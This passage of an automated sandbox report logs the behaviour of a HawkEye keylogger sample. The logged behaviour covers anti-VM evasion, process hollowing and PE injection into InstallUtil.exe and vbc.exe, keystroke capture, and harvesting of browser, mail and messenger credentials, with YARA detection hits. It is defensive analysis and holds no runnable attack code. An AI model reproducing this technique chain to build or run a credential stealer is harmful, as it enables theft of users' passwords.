            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Users\user\AppData\Roaming\name.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 180000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeWindow / User API: threadDelayed 386
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2400Thread sleep time: -300000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\name.exe TID: 2548Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\name.exe TID: 2516Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Users\user\AppData\Roaming\name.exe TID: 1952Thread sleep count: 340 > 30
            Source: C:\Users\user\AppData\Roaming\name.exe TID: 2516Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2616Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 1288Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2316Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2324Thread sleep time: -140000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2280Thread sleep time: -77200s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 1484Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004161B0 memset,GetSystemInfo,
            Source: C:\Users\user\AppData\Roaming\name.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\name.exeThread delayed: delay time: 30000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 120000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 140000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 180000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,
            Source: C:\Users\user\AppData\Roaming\name.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\name.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            .NET source code references suspicious native API functionsShow sources
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 5.2.InstallUtil.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
            Allocates memory in foreign processesShow sources
            Source: C:\Users\user\AppData\Roaming\name.exeMemory allocated: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\AppData\Roaming\name.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\AppData\Roaming\name.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000
            Source: C:\Users\user\AppData\Roaming\name.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 402000
            Source: C:\Users\user\AppData\Roaming\name.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 482000
            Source: C:\Users\user\AppData\Roaming\name.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 486000
            Source: C:\Users\user\AppData\Roaming\name.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 7EFDE008
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'
            Source: C:\Users\user\AppData\Roaming\name.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: InstallUtil.exe, 00000005.00000002.2365146577.0000000001250000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: InstallUtil.exe, 00000005.00000002.2365146577.0000000001250000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: InstallUtil.exe, 00000005.00000002.2365146577.0000000001250000.00000002.00000001.sdmpBinary or memory string: !Progman
            Source: C:\Users\user\AppData\Roaming\name.exeQueries volume information: C:\Users\user\AppData\Roaming\name.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\name.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Users\user\AppData\Local\Temp\InstallUtil.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00406278 GetVersionExA,
            Source: C:\Users\user\AppData\Roaming\name.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM FirewallProduct

            Stealing of Sensitive Information:

            barindex
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
            Yara detected MailPassViewShow sources
            Source: Yara matchFile source: 5.2.InstallUtil.exe.36594d0.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.36594d0.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.45fa72.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.2176599122.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 944, type: MEMORYSTR
            Searches for Windows Mail specific filesShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cert7.db
            Tries to steal Instant Messenger accounts or passwordsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Tries to steal Mail credentials (via file registry)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword
            Yara detected WebBrowserPassView password recovery toolShow sources
            Source: Yara matchFile source: 4.2.name.exe.368a90f.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.36716f0.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.36716f0.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.36594d0.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3491d2f.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.409c0d.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
